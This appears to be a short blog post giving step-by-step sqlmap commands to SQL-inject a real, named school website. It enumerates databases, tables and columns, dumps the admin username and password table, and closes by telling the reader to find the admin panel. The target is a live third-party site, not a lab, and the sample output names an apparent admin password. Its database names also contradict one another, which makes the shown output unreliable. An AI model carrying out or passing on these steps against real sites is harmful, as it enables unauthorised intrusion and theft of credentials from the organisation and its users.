first of all we need a vulnerable target! here it is http://www.alliedschools.edu.pk/main_news.php?news_id=52 ok first step is to fatch the databases command will be like this one python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 –dbs here:- -u is stand for which is vulnerable to SQL injection and –dbs is used for fatching total databases in website
ok after completing the process of fataching the databases it will something like that available databases(8) [*]informtion_schema [*]alliedschools_web
now we are going to expoit database alliedschools_web and fatch the tables present in it
ok command will change a little bit :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables
here :-
-D and then name of the database from which we want to fatch tables and
--tables is for fatching total table present in the database
after processing we will get the tables present in database "alliedschools_web"
after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus
now we are going to fatch the cloumns from table admin of database alliedschools_campus
command is :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns
now we will get something like this
Database: alliedschools_campus
Table : admin
[12 columns ]
admin_password
admin_username
admin_email
This is the last command to get the admin username and password
command is
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password, admin_username --dump
and after finishing process we will get something like that
Database: alliedschools_campus
Table : admin
[6 entries]
admin_password admin_username
$erver admin
...... ......
Now You Have admin Password of website, Find admin panel
0 comments:
Post a Comment